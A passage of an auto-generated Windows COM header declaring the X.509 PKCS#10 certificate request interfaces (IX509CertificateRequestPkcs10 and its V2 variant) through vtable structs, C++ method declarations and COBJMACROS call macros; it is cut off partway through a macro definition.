#define IX509CertificateRequestPkcs10_get_HashAlgorithm(This,ppValue)	\
    ( (This)->lpVtbl -> get_HashAlgorithm(This,ppValue) ) 

#define IX509CertificateRequestPkcs10_put_HashAlgorithm(This,pValue)	\
    ( (This)->lpVtbl -> put_HashAlgorithm(This,pValue) ) 

#define IX509CertificateRequestPkcs10_get_AlternateSignatureAlgorithm(This,pValue)	\
    ( (This)->lpVtbl -> get_AlternateSignatureAlgorithm(This,pValue) ) 

#define IX509CertificateRequestPkcs10_put_AlternateSignatureAlgorithm(This,Value)	\
    ( (This)->lpVtbl -> put_AlternateSignatureAlgorithm(This,Value) ) 

#define IX509CertificateRequestPkcs10_get_RawData(This,Encoding,pValue)	\
    ( (This)->lpVtbl -> get_RawData(This,Encoding,pValue) ) 


#define IX509CertificateRequestPkcs10_InitializeFromTemplateName(This,Context,strTemplateName)	\
    ( (This)->lpVtbl -> InitializeFromTemplateName(This,Context,strTemplateName) ) 

#define IX509CertificateRequestPkcs10_InitializeFromPrivateKey(This,Context,pPrivateKey,strTemplateName)	\
    ( (This)->lpVtbl -> InitializeFromPrivateKey(This,Context,pPrivateKey,strTemplateName) ) 

#define IX509CertificateRequestPkcs10_InitializeFromPublicKey(This,Context,pPublicKey,strTemplateName)	\
    ( (This)->lpVtbl -> InitializeFromPublicKey(This,Context,pPublicKey,strTemplateName) ) 

#define IX509CertificateRequestPkcs10_InitializeFromCertificate(This,Context,strCertificate,Encoding,InheritOptions)	\
    ( (This)->lpVtbl -> InitializeFromCertificate(This,Context,strCertificate,Encoding,InheritOptions) ) 

#define IX509CertificateRequestPkcs10_InitializeDecode(This,strEncodedData,Encoding)	\
    ( (This)->lpVtbl -> InitializeDecode(This,strEncodedData,Encoding) ) 

#define IX509CertificateRequestPkcs10_CheckSignature(This,AllowedSignatureTypes)	\
    ( (This)->lpVtbl -> CheckSignature(This,AllowedSignatureTypes) ) 

#define IX509CertificateRequestPkcs10_IsSmartCard(This,pValue)	\
    ( (This)->lpVtbl -> IsSmartCard(This,pValue) ) 

#define IX509CertificateRequestPkcs10_get_TemplateObjectId(This,ppValue)	\
    ( (This)->lpVtbl -> get_TemplateObjectId(This,ppValue) ) 

#define IX509CertificateRequestPkcs10_get_PublicKey(This,ppValue)	\
    ( (This)->lpVtbl -> get_PublicKey(This,ppValue) ) 

#define IX509CertificateRequestPkcs10_get_PrivateKey(This,ppValue)	\
    ( (This)->lpVtbl -> get_PrivateKey(This,ppValue) ) 

#define IX509CertificateRequestPkcs10_get_NullSigned(This,pValue)	\
    ( (This)->lpVtbl -> get_NullSigned(This,pValue) ) 

#define IX509CertificateRequestPkcs10_get_ReuseKey(This,pValue)	\
    ( (This)->lpVtbl -> get_ReuseKey(This,pValue) ) 

#define IX509CertificateRequestPkcs10_get_OldCertificate(This,Encoding,pValue)	\
    ( (This)->lpVtbl -> get_OldCertificate(This,Encoding,pValue) ) 

#define IX509CertificateRequestPkcs10_get_Subject(This,ppValue)	\
    ( (This)->lpVtbl -> get_Subject(This,ppValue) ) 

#define IX509CertificateRequestPkcs10_put_Subject(This,pValue)	\
    ( (This)->lpVtbl -> put_Subject(This,pValue) ) 

#define IX509CertificateRequestPkcs10_get_CspStatuses(This,ppValue)	\
    ( (This)->lpVtbl -> get_CspStatuses(This,ppValue) ) 

#define IX509CertificateRequestPkcs10_get_SmimeCapabilities(This,pValue)	\
    ( (This)->lpVtbl -> get_SmimeCapabilities(This,pValue) ) 

#define IX509CertificateRequestPkcs10_put_SmimeCapabilities(This,Value)	\
    ( (This)->lpVtbl -> put_SmimeCapabilities(This,Value) ) 

#define IX509CertificateRequestPkcs10_get_SignatureInformation(This,ppValue)	\
    ( (This)->lpVtbl -> get_SignatureInformation(This,ppValue) ) 

#define IX509CertificateRequestPkcs10_get_KeyContainerNamePrefix(This,pValue)	\
    ( (This)->lpVtbl -> get_KeyContainerNamePrefix(This,pValue) ) 

#define IX509CertificateRequestPkcs10_put_KeyContainerNamePrefix(This,Value)	\
    ( (This)->lpVtbl -> put_KeyContainerNamePrefix(This,Value) ) 

#define IX509CertificateRequestPkcs10_get_CryptAttributes(This,ppValue)	\
    ( (This)->lpVtbl -> get_CryptAttributes(This,ppValue) ) 

#define IX509CertificateRequestPkcs10_get_X509Extensions(This,ppValue)	\
    ( (This)->lpVtbl -> get_X509Extensions(This,ppValue) ) 

#define IX509CertificateRequestPkcs10_get_CriticalExtensions(This,ppValue)	\
    ( (This)->lpVtbl -> get_CriticalExtensions(This,ppValue) ) 

#define IX509CertificateRequestPkcs10_get_SuppressOids(This,ppValue)	\
    ( (This)->lpVtbl -> get_SuppressOids(This,ppValue) ) 

#define IX509CertificateRequestPkcs10_get_RawDataToBeSigned(This,Encoding,pValue)	\
    ( (This)->lpVtbl -> get_RawDataToBeSigned(This,Encoding,pValue) ) 

#define IX509CertificateRequestPkcs10_get_Signature(This,Encoding,pValue)	\
    ( (This)->lpVtbl -> get_Signature(This,Encoding,pValue) ) 

#define IX509CertificateRequestPkcs10_GetCspStatuses(This,KeySpec,ppCspStatuses)	\
    ( (This)->lpVtbl -> GetCspStatuses(This,KeySpec,ppCspStatuses) ) 

#endif /* COBJMACROS */


#endif 	/* C style interface */




#endif 	/* __IX509CertificateRequestPkcs10_INTERFACE_DEFINED__ */


#ifndef __IX509CertificateRequestPkcs10V2_INTERFACE_DEFINED__
#define __IX509CertificateRequestPkcs10V2_INTERFACE_DEFINED__

/* interface IX509CertificateRequestPkcs10V2 */
/* [helpstring][dual][uuid][object] */ 


EXTERN_C const IID IID_IX509CertificateRequestPkcs10V2;

#if defined(__cplusplus) && !defined(CINTERFACE)
    
    MIDL_INTERFACE("728ab35b-217d-11da-b2a4-000e7bbb2b09")
    IX509CertificateRequestPkcs10V2 : public IX509CertificateRequestPkcs10
    {
    public:
        virtual HRESULT STDMETHODCALLTYPE InitializeFromTemplate( 
            /* [in] */ X509CertificateEnrollmentContext context,
            /* [in] */ __RPC__in_opt IX509EnrollmentPolicyServer *pPolicyServer,
            /* [in] */ __RPC__in_opt IX509CertificateTemplate *pTemplate) = 0;
        
        virtual HRESULT STDMETHODCALLTYPE InitializeFromPrivateKeyTemplate( 
            /* [in] */ X509CertificateEnrollmentContext Context,
            /* [in] */ __RPC__in_opt IX509PrivateKey *pPrivateKey,
            /* [in] */ __RPC__in_opt IX509EnrollmentPolicyServer *pPolicyServer,
            /* [in] */ __RPC__in_opt IX509CertificateTemplate *pTemplate) = 0;
        
        virtual HRESULT STDMETHODCALLTYPE InitializeFromPublicKeyTemplate( 
            /* [in] */ X509CertificateEnrollmentContext Context,
            /* [in] */ __RPC__in_opt IX509PublicKey *pPublicKey,
            /* [in] */ __RPC__in_opt IX509EnrollmentPolicyServer *pPolicyServer,
            /* [in] */ __RPC__in_opt IX509CertificateTemplate *pTemplate) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_PolicyServer( 
            /* [retval][out] */ __RPC__deref_out_opt IX509EnrollmentPolicyServer **ppPolicyServer) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_Template( 
            /* [retval][out] */ __RPC__deref_out_opt IX509CertificateTemplate **ppTemplate) = 0;
        
    };
    
    
#else 	/* C style interface */

    typedef struct IX509CertificateRequestPkcs10V2Vtbl
    {
        BEGIN_INTERFACE
        
        HRESULT ( STDMETHODCALLTYPE *QueryInterface )( 
            __RPC__in IX509CertificateRequestPkcs10V2 * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [annotation][iid_is][out] */ 
            _COM_Outptr_  void **ppvObject);
        
        ULONG ( STDMETHODCALLTYPE *AddRef )( 
            __RPC__in IX509CertificateRequestPkcs10V2 * This);
        
        ULONG ( STDMETHODCALLTYPE *Release )( 
            __RPC__in IX509CertificateRequestPkcs10V2 * This);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfoCount )( 
            __RPC__in IX509CertificateRequestPkcs10V2 * This,
            /* [out] */ __RPC__out UINT *pctinfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfo )( 
            __RPC__in IX509CertificateRequestPkcs10V2 * This,
            /* [in] */ UINT iTInfo,
            /* [in] */ LCID lcid,
            /* [out] */ __RPC__deref_out_opt ITypeInfo **ppTInfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetIDsOfNames )( 
            __RPC__in IX509CertificateRequestPkcs10V2 * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [size_is][in] */ __RPC__in_ecount_full(cNames) LPOLESTR *rgszNames,
            /* [range][in] */ __RPC__in_range(0,16384) UINT cNames,
            /* [in] */ LCID lcid,
            /* [size_is][out] */ __RPC__out_ecount_full(cNames) DISPID *rgDispId);
        
        /* [local] */ HRESULT ( STDMETHODCALLTYPE *Invoke )( 
            IX509CertificateRequestPkcs10V2 * This,
            /* [annotation][in] */ 
            _In_  DISPID dispIdMember,
            /* [annotation][in] */ 
            _In_  REFIID riid,
            /* [annotation][in] */ 
            _In_  LCID lcid,
            /* [annotation][in] */ 
            _In_  WORD wFlags,
            /* [annotation][out][in] */ 
            _In_  DISPPARAMS *pDispParams,
            /* [annotation][out] */ 
            _Out_opt_  VARIANT *pVarResult,
            /* [annotation][out] */ 
            _Out_opt_  EXCEPINFO *pExcepInfo,
            /* [annotation][out] */ 
            _Out_opt_  UINT *puArgErr);
        
        HRESULT ( STDMETHODCALLTYPE *Initialize )( 
            __RPC__in IX509CertificateRequestPkcs10V2 * This,
            /* [in] */ X509CertificateEnrollmentContext Context);
        
        HRESULT ( STDMETHODCALLTYPE *Encode )( 
            __RPC__in IX509CertificateRequestPkcs10V2 * This);
        
        HRESULT ( STDMETHODCALLTYPE *ResetForEncode )( 
            __RPC__in IX509CertificateRequestPkcs10V2 * This);
        
        HRESULT ( STDMETHODCALLTYPE *GetInnerRequest )( 
            __RPC__in IX509CertificateRequestPkcs10V2 * This,
            /* [in] */ InnerRequestLevel Level,
            /* [retval][out] */ __RPC__deref_out_opt IX509CertificateRequest **ppValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_Type )( 
            __RPC__in IX509CertificateRequestPkcs10V2 * This,
            /* [retval][out] */ __RPC__out X509RequestType *pValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_EnrollmentContext )( 
            __RPC__in IX509CertificateRequestPkcs10V2 * This,
            /* [retval][out] */ __RPC__out X509CertificateEnrollmentContext *pValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_Silent )( 
            __RPC__in IX509CertificateRequestPkcs10V2 * This,
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_Silent )( 
            __RPC__in IX509CertificateRequestPkcs10V2 * This,
            /* [in] */ VARIANT_BOOL Value);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_ParentWindow )( 
            __RPC__in IX509CertificateRequestPkcs10V2 * This,
            /* [retval][out] */ __RPC__out LONG *pValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_ParentWindow )( 
            __RPC__in IX509CertificateRequestPkcs10V2 * This,
            /* [in] */ LONG Value);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_UIContextMessage )( 
            __RPC__in IX509CertificateRequestPkcs10V2 * This,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_UIContextMessage )( 
            __RPC__in IX509CertificateRequestPkcs10V2 * This,
            /* [in] */ __RPC__in BSTR Value);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_SuppressDefaults )( 
            __RPC__in IX509CertificateRequestPkcs10V2 * This,
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_SuppressDefaults )( 
            __RPC__in IX509CertificateRequestPkcs10V2 * This,
            /* [in] */ VARIANT_BOOL Value);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_RenewalCertificate )( 
            __RPC__in IX509CertificateRequestPkcs10V2 * This,
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_RenewalCertificate )( 
            __RPC__in IX509CertificateRequestPkcs10V2 * This,
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR Value);
        
        /* [custom][propget] */ HRESULT ( STDMETHODCALLTYPE *get_ClientId )( 
            __RPC__in IX509CertificateRequestPkcs10V2 * This,
            /* [retval][out] */ __RPC__out RequestClientInfoClientId *pValue);
        
        /* [custom][propput] */ HRESULT ( STDMETHODCALLTYPE *put_ClientId )( 
            __RPC__in IX509CertificateRequestPkcs10V2 * This,
            /* [in] */ RequestClientInfoClientId Value);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_CspInformations )( 
            __RPC__in IX509CertificateRequestPkcs10V2 * This,
            /* [retval][out] */ __RPC__deref_out_opt ICspInformations **ppValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_CspInformations )( 
            __RPC__in IX509CertificateRequestPkcs10V2 * This,
            /* [in] */ __RPC__in_opt ICspInformations *pValue);
        
        /* [custom][propget] */ HRESULT ( STDMETHODCALLTYPE *get_HashAlgorithm )( 
            __RPC__in IX509CertificateRequestPkcs10V2 * This,
            /* [retval][out] */ __RPC__deref_out_opt IObjectId **ppValue);
        
        /* [custom][propput] */ HRESULT ( STDMETHODCALLTYPE *put_HashAlgorithm )( 
            __RPC__in IX509CertificateRequestPkcs10V2 * This,
            /* [in] */ __RPC__in_opt IObjectId *pValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_AlternateSignatureAlgorithm )( 
            __RPC__in IX509CertificateRequestPkcs10V2 * This,
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_AlternateSignatureAlgorithm )( 
            __RPC__in IX509CertificateRequestPkcs10V2 * This,
            /* [in] */ VARIANT_BOOL Value);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_RawData )( 
            __RPC__in IX509CertificateRequestPkcs10V2 * This,
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        HRESULT ( STDMETHODCALLTYPE *InitializeFromTemplateName )( 
            __RPC__in IX509CertificateRequestPkcs10V2 * This,
            /* [in] */ X509CertificateEnrollmentContext Context,
            /* [in] */ __RPC__in BSTR strTemplateName);
        
        /* [custom] */ HRESULT ( STDMETHODCALLTYPE *InitializeFromPrivateKey )( 
            __RPC__in IX509CertificateRequestPkcs10V2 * This,
            /* [in] */ X509CertificateEnrollmentContext Context,
            /* [in] */ __RPC__in_opt IX509PrivateKey *pPrivateKey,
            /* [in] */ __RPC__in BSTR strTemplateName);
        
        HRESULT ( STDMETHODCALLTYPE *InitializeFromPublicKey )( 
            __RPC__in IX509CertificateRequestPkcs10V2 * This,
            /* [in] */ X509CertificateEnrollmentContext Context,
            /* [in] */ __RPC__in_opt IX509PublicKey *pPublicKey,
            /* [in] */ __RPC__in BSTR strTemplateName);
        
        HRESULT ( STDMETHODCALLTYPE *InitializeFromCertificate )( 
            __RPC__in IX509CertificateRequestPkcs10V2 * This,
            /* [in] */ X509CertificateEnrollmentContext Context,
            /* [in] */ __RPC__in BSTR strCertificate,
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [defaultvalue][in] */ X509RequestInheritOptions InheritOptions);
        
        HRESULT ( STDMETHODCALLTYPE *InitializeDecode )( 
            __RPC__in IX509CertificateRequestPkcs10V2 * This,
            /* [in] */ __RPC__in BSTR strEncodedData,
            /* [defaultvalue][in] */ EncodingType Encoding);
        
        HRESULT ( STDMETHODCALLTYPE *CheckSignature )( 
            __RPC__in IX509CertificateRequestPkcs10V2 * This,
            /* [defaultvalue][in] */ Pkcs10AllowedSignatureTypes AllowedSignatureTypes);
        
        HRESULT ( STDMETHODCALLTYPE *IsSmartCard )( 
            __RPC__in IX509CertificateRequestPkcs10V2 * This,
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_TemplateObjectId )( 
            __RPC__in IX509CertificateRequestPkcs10V2 * This,
            /* [retval][out] */ __RPC__deref_out_opt IObjectId **ppValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_PublicKey )( 
            __RPC__in IX509CertificateRequestPkcs10V2 * This,
            /* [retval][out] */ __RPC__deref_out_opt IX509PublicKey **ppValue);
        
        /* [custom][propget] */ HRESULT ( STDMETHODCALLTYPE *get_PrivateKey )( 
            __RPC__in IX509CertificateRequestPkcs10V2 * This,
            /* [retval][out] */ __RPC__deref_out_opt IX509PrivateKey **ppValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_NullSigned )( 
            __RPC__in IX509CertificateRequestPkcs10V2 * This,
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_ReuseKey )( 
            __RPC__in IX509CertificateRequestPkcs10V2 * This,
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_OldCertificate )( 
            __RPC__in IX509CertificateRequestPkcs10V2 * This,
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        /* [custom][propget] */ HRESULT ( STDMETHODCALLTYPE *get_Subject )( 
            __RPC__in IX509CertificateRequestPkcs10V2 * This,
            /* [retval][out] */ __RPC__deref_out_opt IX500DistinguishedName **ppValue);
        
        /* [custom][propput] */ HRESULT ( STDMETHODCALLTYPE *put_Subject )( 
            __RPC__in IX509CertificateRequestPkcs10V2 * This,
            /* [in] */ __RPC__in_opt IX500DistinguishedName *pValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_CspStatuses )( 
            __RPC__in IX509CertificateRequestPkcs10V2 * This,
            /* [retval][out] */ __RPC__deref_out_opt ICspStatuses **ppValue);
        
        /* [custom][propget] */ HRESULT ( STDMETHODCALLTYPE *get_SmimeCapabilities )( 
            __RPC__in IX509CertificateRequestPkcs10V2 * This,
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue);
        
        /* [custom][propput] */ HRESULT ( STDMETHODCALLTYPE *put_SmimeCapabilities )( 
            __RPC__in IX509CertificateRequestPkcs10V2 * This,
            /* [in] */ VARIANT_BOOL Value);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_SignatureInformation )( 
            __RPC__in IX509CertificateRequestPkcs10V2 * This,
            /* [retval][out] */ __RPC__deref_out_opt IX509SignatureInformation **ppValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_KeyContainerNamePrefix )( 
            __RPC__in IX509CertificateRequestPkcs10V2 * This,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_KeyContainerNamePrefix )( 
            __RPC__in IX509CertificateRequestPkcs10V2 * This,
            /* [in] */ __RPC__in BSTR Value);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_CryptAttributes )( 
            __RPC__in IX509CertificateRequestPkcs10V2 * This,
            /* [retval][out] */ __RPC__deref_out_opt ICryptAttributes **ppValue);
        
        /* [custom][propget] */ HRESULT ( STDMETHODCALLTYPE *get_X509Extensions )( 
            __RPC__in IX509CertificateRequestPkcs10V2 * This,
            /* [retval][out] */ __RPC__deref_out_opt IX509Extensions **ppValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_CriticalExtensions )( 
            __RPC__in IX509CertificateRequestPkcs10V2 * This,
            /* [retval][out] */ __RPC__deref_out_opt IObjectIds **ppValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_SuppressOids )( 
            __RPC__in IX509CertificateRequestPkcs10V2 * This,
            /* [retval][out] */ __RPC__deref_out_opt IObjectIds **ppValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_RawDataToBeSigned )( 
            __RPC__in IX509CertificateRequestPkcs10V2 * This,
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_Signature )( 
            __RPC__in IX509CertificateRequestPkcs10V2 * This,
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        HRESULT ( STDMETHODCALLTYPE *GetCspStatuses )( 
            __RPC__in IX509CertificateRequestPkcs10V2 * This,
            /* [in] */ X509KeySpec KeySpec,
            /* [retval][out] */ __RPC__deref_out_opt ICspStatuses **ppCspStatuses);
        
        HRESULT ( STDMETHODCALLTYPE *InitializeFromTemplate )( 
            __RPC__in IX509CertificateRequestPkcs10V2 * This,
            /* [in] */ X509CertificateEnrollmentContext context,
            /* [in] */ __RPC__in_opt IX509EnrollmentPolicyServer *pPolicyServer,
            /* [in] */ __RPC__in_opt IX509CertificateTemplate *pTemplate);
        
        HRESULT ( STDMETHODCALLTYPE *InitializeFromPrivateKeyTemplate )( 
            __RPC__in IX509CertificateRequestPkcs10V2 * This,
            /* [in] */ X509CertificateEnrollmentContext Context,
            /* [in] */ __RPC__in_opt IX509PrivateKey *pPrivateKey,
            /* [in] */ __RPC__in_opt IX509EnrollmentPolicyServer *pPolicyServer,
            /* [in] */ __RPC__in_opt IX509CertificateTemplate *pTemplate);
        
        HRESULT ( STDMETHODCALLTYPE *InitializeFromPublicKeyTemplate )( 
            __RPC__in IX509CertificateRequestPkcs10V2 * This,
            /* [in] */ X509CertificateEnrollmentContext Context,
            /* [in] */ __RPC__in_opt IX509PublicKey *pPublicKey,
            /* [in] */ __RPC__in_opt IX509EnrollmentPolicyServer *pPolicyServer,
            /* [in] */ __RPC__in_opt IX509CertificateTemplate *pTemplate);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_PolicyServer )( 
            __RPC__in IX509CertificateRequestPkcs10V2 * This,
            /* [retval][out] */ __RPC__deref_out_opt IX509EnrollmentPolicyServer **ppPolicyServer);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_Template )( 
            __RPC__in IX509CertificateRequestPkcs10V2 * This,
            /* [retval][out] */ __RPC__deref_out_opt IX509CertificateTemplate **ppTemplate);
        
        END_INTERFACE
    } IX509CertificateRequestPkcs10V2Vtbl;

    interface IX509CertificateRequestPkcs10V2
    {
        CONST_VTBL struct IX509CertificateRequestPkcs10V2Vtbl *lpVtbl;
    };

    

#ifdef COBJMACROS


#define IX509CertificateRequestPkcs10V2_QueryInterface(This,riid,ppvObject)	\
    ( (This)->lpVtbl -> QueryInterface(This,riid,ppvObject) ) 

#define IX509CertificateRequestPkcs10V2_AddRef(This)	\
    ( (This)->lpVtbl -> AddRef(This) ) 

#define IX509CertificateRequestPkcs10V2_Release(This)	\
    ( (This)->lpVtbl -> Release(This) ) 


#define IX509CertificateRequestPkcs10V2_GetTypeInfoCount(This,pctinfo)	\
    ( (This)->lpVtbl -> GetTypeInfoCount(This,pctinfo) ) 

#define IX509CertificateRequestPkcs10V2_GetTypeInfo(This,iTInfo,lcid,ppTInfo)	\
    ( (This)->lpVtbl -> GetTypeInfo(This,iTInfo,lcid,ppTInfo) ) 

#define IX509CertificateRequestPkcs10V2_GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId)	\
    ( (This)->lpVtbl -> GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId) ) 

#define IX509CertificateRequestPkcs10V2_Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr)	\
    ( (This)->lpVtbl -> Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr) ) 


#define IX509CertificateRequestPkcs10V2_Initialize(This,Context)	\
    ( (This)->lpVtbl -> Initialize(This,Context) ) 

#define IX509CertificateRequestPkcs10V2_Encode(This)	\
    ( (This)->lpVtbl -> Encode(This) ) 

#define IX509CertificateRequestPkcs10V2_ResetForEncode(This)	\
    ( (This)->lpVtbl -> ResetForEncode(This) ) 

#define IX509CertificateRequestPkcs10V2_GetInnerRequest(This,Level,ppValue)	\
    ( (This)->lpVtbl -> GetInnerRequest(This,Level,ppValue) ) 

#define IX509CertificateRequestPkcs10V2_get_Type(This,pValue)	\
    ( (This)->lpVtbl -> get_Type(This,pValue) ) 

#define IX509CertificateRequestPkcs10V2_get_EnrollmentContext(This,pValue)	\
    ( (This)->lpVtbl -> get_EnrollmentContext(This,pValue) ) 

#define IX509CertificateRequestPkcs10V2_get_Silent(This,pValue)	\
    ( (This)->lpVtbl -> get_Silent(This,pValue) ) 

#define IX509CertificateRequestPkcs10V2_put_Silent(This,Value)	\
    ( (This)->lpVtbl -> put_Silent(This,Value) ) 

#define IX509CertificateRequestPkcs10V2_get_ParentWindow(This,pValue)	\
    ( (This)->lpVtbl -> get_ParentWindow(This,pValue) ) 

#define IX509CertificateRequestPkcs10V2_put_ParentWindow(This,Value)	\
    ( (This)->lpVtbl -> put_ParentWindow(This,Value) ) 

#define IX509CertificateRequestPkcs10V2_get_UIContextMessage(This,pValue)	\
    ( (This)->lpVtbl -> get_UIContextMessage(This,pValue) ) 

#define IX509CertificateRequestPkcs10V2_put_UIContextMessage(This,Value)	\
    ( (This)->lpVtbl -> put_UIContextMessage(This,Value) ) 

#define IX509CertificateRequestPkcs10V2_get_SuppressDefaults(This,pValue)	\
    ( (This)->lpVtbl -> get_SuppressDefaults(This,pValue) ) 

#define IX509CertificateRequestPkcs10V2_put_SuppressDefaults(This,Value)	\
    ( (This)->lpVtbl -> put_SuppressDefaults(This,Value) ) 

#define IX509CertificateRequestPkcs10V2_get_RenewalCertificate(This,Encoding,pValue)	\
    ( (This)->lpVtbl -> get_RenewalCertificate(This,Encoding,pValue) ) 

#define IX509CertificateRequestPkcs10V2_put_RenewalCertificate(This,Encoding,Value)	\
    ( (This)->lpVtbl -> put_RenewalCertificate(This,Encoding,Value) ) 

#define IX509CertificateRequestPkcs10V2_get_ClientId(This,pValue)	\
    ( (This)->lpVtbl -> get_ClientId(This,pValue) ) 

#define IX509CertificateRequestPkcs10V2_put_ClientId(This,Value)	\
    ( (This)->lpVtbl -> put_ClientId(This,Value) ) 

#define IX509CertificateRequestPkcs10V2_get_CspInformations(This,ppValue)	\
    ( (This)->lpVtbl -> get_CspInformations(This,ppValue) ) 

#define IX509CertificateRequestPkcs10V2_put_CspInformations(This,pValue)	\
    ( (This)->lpVtbl -> put_CspInformations(This,pValue) ) 

#define IX509CertificateRequestPkcs10V2_get_HashAlgorithm(This,ppValue)	\
    ( (This)->lpVtbl -> get_HashAlgorithm(This,ppValue) ) 

#define IX509CertificateRequestPkcs10V2_put_HashAlgorithm(This,pValue)	\
    ( (This)->lpVtbl -> put_HashAlgorithm(This,pValue) ) 

#define IX509CertificateRequestPkcs10V2_get_AlternateSignatureAlgorithm(This,pValue)	\
    ( (This)->lpVtbl -> get_AlternateSignatureAlgorithm(This,pValue) ) 

#define IX509CertificateRequestPkcs10V2_put_AlternateSignatureAlgorithm(This,Value)	\
    ( (This)->lpVtbl -> put_AlternateSignatureAlgorithm(This,Value) ) 

#define IX509CertificateRequestPkcs10V2_get_RawData(This,Encoding,pValue)	\
    ( (This)->lpVtbl -> get_RawData(This,Encoding,pValue) ) 


#define IX509CertificateRequestPkcs10V2_InitializeFromTemplateName(This,Context,strTemplateName)	\
    ( (This)->lpVtbl -> InitializeFromTemplateName(This,Context,strTemplateName) ) 

#define IX509CertificateRequestPkcs10V2_InitializeFromPrivateKey(This,Context,pPrivateKey,strTemplateName)	\
    ( (This)->lpVtbl -> InitializeFromPrivateKey(This,Context,pPrivateKey,strTemplateName) ) 

#define IX509CertificateRequestPkcs10V2_InitializeFromPublicKey(This,Context,pPublicKey,strTemplateName)	\
    ( (This)->lpVtbl -> InitializeFromPublicKey(This,Context,pPublicKey,strTemplateName) ) 

#define IX509CertificateRequestPkcs10V2_InitializeFromCertificate(This,Context,strCertificate,Encoding,InheritOptions)	\
    ( (This)->lpVtbl -> InitializeFromCertificate(This,Context,strCertificate,Encoding,InheritOptions) ) 

#define IX509CertificateRequestPkcs10V2_InitializeDecode(This,strEncodedData,Encoding)	\
    ( (This)->lpVtbl -> InitializeDecode(This,strEncodedData,Encoding) ) 

#define IX509CertificateRequestPkcs10V2_CheckSignature(This,AllowedSignatureTypes)	\
    ( (This)->lpVtbl -> CheckSignature(This,AllowedSignatureTypes) ) 

#define IX509CertificateRequestPkcs10V2_IsSmartCard(This,pValue)	\
    ( (This)->lpVtbl -> IsSmartCard(This,pValue) ) 

#define IX509CertificateRequestPkcs10V2_get_TemplateObjectId(This,ppValue)	\
    ( (This)->lpVtbl -> get_TemplateObjectId(This,ppValue) ) 

#define IX509CertificateRequestPkcs10V2_get_PublicKey(This,ppValue)	\
    ( (This)->lpVtbl -> get_PublicKey(This,ppValue) ) 

#define IX509CertificateRequestPkcs10V2_get_PrivateKey(This,ppValue)	\
    ( (This)->lpVtbl -> get_PrivateKey(This,ppValue) ) 

#define IX509CertificateRequestPkcs10V2_get_NullSigned(This,pValue)	\
    ( (This)->lpVtbl -> get_NullSigned(This,pValue) ) 

#define IX509CertificateRequestPkcs10V2_get_ReuseKey(This,pValue)	\
